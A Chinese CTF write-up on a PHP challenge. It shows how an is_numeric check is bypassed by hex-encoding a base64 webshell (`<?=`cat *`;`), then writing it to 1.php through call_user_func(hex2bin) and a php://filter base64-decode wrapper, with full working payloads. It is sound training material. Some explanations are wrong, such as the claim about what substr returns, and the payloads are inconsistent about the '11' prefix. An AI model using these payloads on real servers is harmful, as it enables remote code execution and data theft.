这个题我想记录一下，主要是这个方法属实是有点惊艳到我了。故而进行记录，也为了方便大家阅读理解。

看题目，根据题目我写一下我的分析：

$_POST传入一个v1，$_GET传入一个v2，一个v3。

赋值符号=   优先级高于and,所以$v2=$v4

is_numeric — 检测变量是否为数字或数字字符。

bool is_numeric ( mixed $var )

如果 var 是数字和数字字符串则返回 TRUE，否则返回 FALSE。

substr — 返回字符串的子串

说明 

string substr( string $string, int $start[, int $length] )

返回字符串 string 由 start 和 length 参数指定的子字符串。

call_user_func — 把第一个参数作为回调函数调用

说明 

mixed call_user_func( callable $callback[, mixed $parameter[, mixed $...]] )

第一个参数 callback 是被调用的回调函数，其余参数是回调函数的参数。 

 file_put_contents — 将一个字符串写入文件

 

<?php

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}


?>

根据上面的函数解释再看一遍源代码。

分析出来：1、 $s = substr($v2,2);由此可知，返回$v2的前三位；

                  2、$str = call_user_func($v1,$s);由此可知$v1是函数,$s是参数

                  3、给v3一定要传入一个文件名字，这样才能构造出来一个接受$str的文件

原本我的想法是：$v3传1.php，$v1传system，但是卡在了$v2传不下去了

参考了大师傅的想法和各位万能的网友的wp后，感觉大有所获，来详细分享。

大师傅wp:

$a='<?=`cat *`;';
$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //这里直接用去掉=的base64
 输出的是 5044383959474e6864434171594473

带e的话会被认为是科学计数法，可以通过is_numeric检测。
大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用，不影响具体的数据内容。
 

 所以对应的我们可以反着来

同时在参考大家的wp的时候学到了一个知识点:在以上$c前加11可以使其在base64编码时产生乱码，可以绕过substr的截断，这点真的很重要。

POST传入:?v1=hex2bin     //这个是call_user_func的前面那个数，就是用作函数

GET传入:?v2=115044383959474e6864434171594473    //加入11造成base64编码前两位乱码绕过substr截断。

                ?V3=php://filter/write=convert.base64-decode/resource=1.php   //将被转化回去的base64数据再次进行解码，用php协议

hex2bin — 转换十六进制字符串为二进制字符串

bin2hex — 函数把包含数据的二进制字符串转换为十六进制值

总结：

传入参数前：首先构造一个命令----》其次将他base64加密----》然后把base64加密的字符串进行16进制转化

目的：构造一条全是数字的经过层层解密后可执行的数据

传入参数后：将原先的输出的全是数字的命令传入v2，并且加上11，绕过substr截断-----》然后再用v1的hex2bin将数字数据转化成base64数据-----》传入v3文件经过php://filter伪协议进行解密----》执行命令

目的：其实就是一个解密的过程

以下为此方法构造命令的新姿势，只是谈谈思路：

那么已经有了这种思路我们是否能够通过这种思路自己构造命令呢？？

当然可行，试试。

 构造一条获取f*文件的命令，创建一个1.php文件

$a='<?=`cat f*`;';
$b=base64_encode($a); 
$c=bin2hex($b);     

执行代码，得到命令。

$a='<?=`cat f*`;';
$b=base64_encode($a);  
$c=bin2hex($b);    
输出   5044383959474e686443426d4b6d4137

不太行，有字母

不死心，再试试

$a='<?=`tac *`;';
$b=base64_encode($a); 
$c=bin2hex($b);

echo "$c";

输出的c值是504438395948526859794171594473

完美命令达成啦！！！没有字母真的一个也没有！！！

POST:v1=hex2bin

GET:?v2=504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

但是有点可惜的是并没有把flag回显出来虽然回显出来了东西

 

还是需要查看源代码才能看到flag，很可惜啊。 

 如果有师傅能直接回显出来flag的话，真的真的真的，请教教我，谢谢各位师傅啦！！！